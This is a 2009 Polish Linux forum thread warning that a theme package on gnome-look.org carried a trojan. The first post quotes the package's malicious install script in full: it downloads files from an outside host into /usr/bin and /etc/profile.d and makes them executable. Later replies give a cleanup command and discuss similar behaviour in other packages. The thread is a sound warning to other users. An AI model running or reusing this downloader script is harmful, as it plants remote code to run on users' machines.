Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!
Ogłoszenie
Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.
#1 2009-12-11 13:08:35
azhag - 
Admin łajza
- azhag
- Admin łajza
- Skąd: Warszawa
- Zarejestrowany: 2005-11-15
Wirusy na gnome-look.org
Chodzi o skrypt, który wykonuje się w systemie podczas instalacji z paczki Deb i wygląda następująco:
Kod:
#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
http://www.ubucentrum.net/2009/12/trojany-w-ukryte- … agrazaja.html
Błogosławieni, którzy czynią FAQ.
opencaching :: debian sources.list :: coś jakby blog :: polski portal debiana :: linux user #403712
Offline
#2 2009-12-11 14:18:50
ilin - Palacz
- ilin
- Palacz
- Skąd: PRLu
- Zarejestrowany: 2006-05-03
Re: Wirusy na gnome-look.org
Zawsze mówiłem ze gnome to zło :)
Offline
#3 2009-12-11 14:21:10
marg1 - Gentoowy Głupek
- marg1
- Gentoowy Głupek
- Skąd: Bytom
- Zarejestrowany: 2009-05-15
Re: Wirusy na gnome-look.org
Ale jak tak można robić już nawet na Linuksie trzeba uważać? Ja pier.... :[
marg1@jid.dug.net.pl
Linux User Registration Number: #488674
CISCO CCNA Alumni :)
Offline
#4 2009-12-11 14:31:12
azhag - Admin łajza
- azhag
- Admin łajza
- Skąd: Warszawa
- Zarejestrowany: 2005-11-15
Re: Wirusy na gnome-look.org
marg1 napisał(-a):
już nawet na Linuksie trzeba uważać?
Zawsze trzeba uważać, podczas dodawania czegokolwiek z niepewnego źródła.
Błogosławieni, którzy czynią FAQ.
opencaching :: debian sources.list :: coś jakby blog :: polski portal debiana :: linux user #403712
Offline
#5 2009-12-11 14:45:36
k4misiek - Green Reaper
- k4misiek
- Green Reaper
- Skąd: Poznań
- Zarejestrowany: 2006-11-11
Re: Wirusy na gnome-look.org
Dlatego nigdy nie instaluje pakietów z poza oficjalnego repo... dobra skłamałem. Używałem kontrolki głośności z Hag GNU/Linux ;)
Tak przy okazji, jak oprogramowanie jest dobre i użyteczne... azhag czy twój aplet głośności który usadawia się w tacce systemowej wykorzystany w Hagu wraz z hag-fluxbox-exit mogą wejść do oficjalnego repozytorium Debiana ?
You are registered as user #464141 with the Linux Counter
Offline
#6 2009-12-11 15:11:39
azhag - Admin łajza
- azhag
- Admin łajza
- Skąd: Warszawa
- Zarejestrowany: 2005-11-15
Re: Wirusy na gnome-look.org
sp3cu napisał(-a):
azhag czy twój aplet głośności który usadawia się w tacce systemowej wykorzystany w Hagu wraz z hag-fluxbox-exit mogą wejść do oficjalnego repozytorium Debiana ?
Aplet miksera nie jest mój, zaś hag-exit-fluxbox czekają poważne zmiany.
Może kiedyś, jak znajdę kogoś kto zasponsoruje moje pakiety, wprowadzę to czy tamto.
Błogosławieni, którzy czynią FAQ.
opencaching :: debian sources.list :: coś jakby blog :: polski portal debiana :: linux user #403712
Offline
#7 2009-12-13 16:32:45
ippo76 - fakam fszycho
Re: Wirusy na gnome-look.org
Ha,
właśnie po zainstalowaniu kilku motywów z gnome.look miałem problemy z zawieszaniem kompa - wybrałem sobie kilka nowo zainstalowanych* motywów do losowego wyświetlania i jeden z nich (podejrzewam motyw CBA, linkowałem go bodajże w "Humorze") zawieszał mi system, gdy próbowałem się z mojego usera zalogować w okienku na drugiego (Aplikacje>Narzędzia systemowe>Nowe logowanie w oknie).
Nie sądzę, żeby to był jakiś wirus czy inne dziadostwo, raczej spartaczony motyw, ale mogę się mylić. Dlatego pożegnałem wszystkie motywy z gnome.look (choć tych z Adrianą Lima było mi szkoda ;) ).
* bo te defaultowe są smutne i brzydkie
ippo76@jid.dug.net.pl
Moja składka do ZUS = 2/3, moja składka do OFE = 1/3;
Stan mojego konta w ZUS = 2XYZ, stan konta w OFE = 3XYZ.
Offline
#8 2009-12-23 17:11:55
qluk - Pan inż. Cyc
- qluk
- Pan inż. Cyc
- Skąd: Katowice
- Zarejestrowany: 2006-05-22
Re: Wirusy na gnome-look.org
Najsmieszniejsze jest to, ze nigdzie nie moge znalezc tych skrytpow co je sciaga. Trudno ocenic wiec co to za zagrozenie nie wiedzac co zostaje pobrane. Na dobra sprawe to moze byc nawet plotka puszczona w obieg zeby udowodnic jakies zagrozenia na linuxie. No i co to jest za "rozwiazanie" problemu
Kod:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
Usuniecie skryptow i nie zastapienie ich oryginalami do tego "index.php" ? Skad on ma byc usuniety bo wg. tego z lokacji w ktorej sie wlasnie znajdujemy.
----po glebszym googlowaniu i klikaniu w kolejne linki-------
http://404.g-net.pl/?p=1412
Wyglada to dziwacznie, bo z tego co widac to jedyne to ping na jakims dziwnym porcie, do strony na ktorej miedzy innymi pisza o tym jak zrobic phishing do wow'a.
------
Za to z tego co przypadkiem znalazlem na inych forach:
Niestety ostatnio udostępniona instalka (.deb) Google Chrome beta dla Linuksa zachowuje się prawie identycznie:
- do sources.list dodaje:
deb http://dl.google.com/linux/deb/ stable main
- do keyringu apta dodaje klucz Googli:
pub 1024D/7FAC5991 2007-03-08
uid Google, Inc. Linux Package Signing Key
sub 2048g/C07CB649 2007-03-08
- do /etc/cron.daily wrzuca skrypt, który sprawdza czy dwie powyższe rzeczy są zrobione i jak nie to je robi…
Jak znajde chwile wolnego czasu to postaram sie potwierdzic badz zaprzeczyc, chyba ze ktos to zrobi w miedzy czasie :)
Przy okazji wyszperal mi sie ciekawy watek odnosnie skype (tez nie sprawdzalem jeszcze) http://forum.suse.pl/index.php?/topic,21233.0.html
I tutaj link ktory jest rowniez tam podany (ang.; IMHO bardzo dobrze opisuje sytuacje) http://nic.phys.ethz.ch/news/1106655341/index_html
Ostatnio edytowany przez qluk (2009-12-23 17:25:13)
Offline
#9 2009-12-23 17:26:47
bns - unknown
Re: Wirusy na gnome-look.org
qluk napisał(-a):
[..]Przy okazji wyszperal mi sie ciekawy watek odnosnie skype (tez nie sprawdzalem jeszcze) http://forum.suse.pl/index.php?/topic,21233.0.html[..]
Skype to zło! Od początku o nim głośno. W 2006 na BlackHat poruszyli temat łączenia się tego badziewia z nieznanymi adresami IP.
Offline